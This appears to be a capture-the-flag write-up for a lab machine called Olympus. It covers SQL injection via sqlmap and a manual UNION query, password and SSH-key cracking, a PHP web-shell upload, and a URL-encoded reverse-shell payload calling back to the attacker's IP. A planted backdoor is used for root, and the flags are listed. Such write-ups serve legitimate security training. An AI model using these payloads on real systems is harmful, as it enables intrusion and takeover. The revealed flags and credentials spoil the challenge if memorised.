Olympus

Target IP: 10.10.83.153


I added 10.10.83.153 olympus.thm vhost inside the /etc/hosts file and now we are ready to go!

Scanning

61664f041b06ae9625bf45429b3f9139.png
c3bec38b7a597afc275eca941edfc79f.png
78861344574aac1b58f32bfba919cbe9.png

Only two ports are open on the machine: SSH and HTTP. I will start my enumeration with the HTTP first.


Enumeration

Port 80: HTTP

5acd17a10a06988c316bb3066e263015.png
Heading to olympus.thm shows us the webpage above. There is a hint The old version of the website is still accessible on this domain. Viewing the source code of this page did not provide any useful information. Time for a directory search!

0ce905e840a9d13d4fd7e5fcb6def64a.png
Doing a simple directory search gives us a plenty of information. The result /~webmaster looks interesting.

0b33387cae19c253140145f78eff284e.png
The webpage above is displayed to us when we browse to this directory. It looks like this is the first version of the website.

115dc6c5786bc82fa6d21e9e0fe5c9fa.png
Viewing the source code the webpage mentions it is Simple Content Management System by Victor Alagwu. Doing a Google search shows this application version is vulnerable to SQL injection. However, it seems the old website used a parameter for categories of topics. This paramter could be vulnerable.

f4df8519410a9ab0bd35b02d6eabfa52.png
It looks like the cat_id parameter is vulnerable according to sqlmap. I used the command sqlmap -u "http://olympus.thm/~webmaster/category.php?cat_id=1" --dump to dump all the tables.

3c85d2ab08ea7baa185675ab07394ea4.png
By dumping the contents of the tables, I got a bunch of useful information. The interesting part is prometheus is not using any randsalt (random salt) to their password.

01706157d787e5429083ce1d33d9ce0b.png
I copied the password hash of each user in a text file called hash.

09ba4da899d0c26a7b37c767fb5b941f.png
Then I used john to crack the hashes. It managed to crack the hash of one user, possibly prometheus. Now we have a login credential of prometheus:summertime we can spray at the old website login page and the SSH.

0a4945730d68b75f3f807183118a0e6e.png
The login credential above worked for the admin page for the old website. However, checking the users page shows prometheus only has User role and we need to obtain the admin privileges. We have the option to create a new user, but we are unable to login as them.

d3d1602593d81fb218042c7da6b8c0ec.png
It looks like we can change our profile picture for our account. Maybe we can use file upload exploit? When the Browse... button is pressed, it shows all formats are accepted. Changing to a php file is also accepted (wtf)? Now the next step is to find out where our profile picture is stored. It looks like it gets stored in the /img/<name> directory. Only problem is we need admin privileges to access our backdoor.

06f3c12ffcda2e7af77fec2d3905f684.png
fde25d9ca7d17efbb040d308cf23de14.png
I added another virtual host called chat.olympus.thm.

4181b6d0b476b3ef45c823043985798f.png
After performing a directory search on the new virtual host, I gained more information. The /uploads is interesting because chat information are stored in this directory. From the database dump above, there was an interesting file called 47c3210d51761686f3af40a875eeaaea.txt.

470fb2e78d6d701e594e49d1dc9dfd7a.png
But this file shows nothing useful.

545b7b3fcd4c7f73daa9a2f1c32b3c37.png
Using the command curl http://olympus.thm/~webmaster/search.php -d "search=' union select 1,2,group_concat(file),4,5,6,7,8,9,10 from chats-- -&submit=", I was able to obtain the uploaded files.

bbab948325c3d2fc81bacb06c63438c3.png
And I was able to access my simple web shell.


Exploitation

9a7fc55b458560c92b86bdb089a61ccf.png
Now I have a simple web shell. I leveraged this to gain a reverse shell connection. I used the PHP payload below, and visited the URL to activate it. And now I have a foothold on the machine.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Full URL: http://chat.olympus.thm/uploads/3573b47dffe7988a0b3e548986a5b3ab.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.

My machine timed out, so the new full URL is http://chat.olympus.thm/uploads/03c049b49938dbe1761d94312d63f02f.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


Privilege Escalation

New IP is 10.10.56.116.

68bc428f709d7340d76fd5e8e5eab651.png

94b6d55254872e9ffe9b795cafcda110.png
There is an unusual binary called cputils. Running it enables us to copy a file from a source to a destination.

33163e116ed128269292c4ed8e86f644.png
Looks like zeus has .ssh key.

020eddcfe3448a00bb582a0afdec997d.png
Now I have the SSH key of user zeus.

e5f3d665a0d17e6fa78a4fa2dd45b5bd.png
However, it is asking for the passphrase.

c5a06ce1065acacf9c25d86de2ba2be3.png
I used ssh2john to obtain the hash of the key. And then using john, I cracked the passphrase of the SSH key. Now I can login as the user zeus. The passphrase is snowflake.

b9f7f16290e8fd448c5df4dcbea03eb0.png
And I am in as zeus.

40c6474650a2a30b68637a931d87931b.png
During further manual enumeration, I found an interesting file that looks like a backdoor with a password inside it. Therefore, the file should work 0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php.

044017bf5de8948467bcf1735599b997.png
And it did! I used the password that is inside the php file to gain access. This is a backdoor that gives us root privileges. The syntax command is already there too!

444431b6fd9b45a3530ce6a17bc3cefc.png
Using the secret backdoor, I managed to obtain a root shell!
Command I used is http://10.10.56.116/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.14.55.153&port=8444 to point to my local machine and port. I had to enter the password again.


Flags

218dfb33d3a3b347e3d08641111693e2.png
Using sqlmap, I dumped the table olympus.flag. This table contains the first flag.

6e23bde37151e7f99efe3151ea276dc4.png
I obtained the second flag. It was inside zeus home directory.

e9075d4a0e88744a097b74d99d136886.png
The root.txt flag once I used the secret backdoor to gain a reverse shell connection.

0311ffb154786bfb3a4740b225815c74.png
The fourth flag requires us to search for it. Using grep -r flag{ should be enough to obtain the last flag file.

b40f3a5356b6ca582c14858a2cd3f7bc.png
The last flag is located at /etc/ssl/private/.bonus.fl4g which is flag{Y0u_G0t_m3_g00d!}.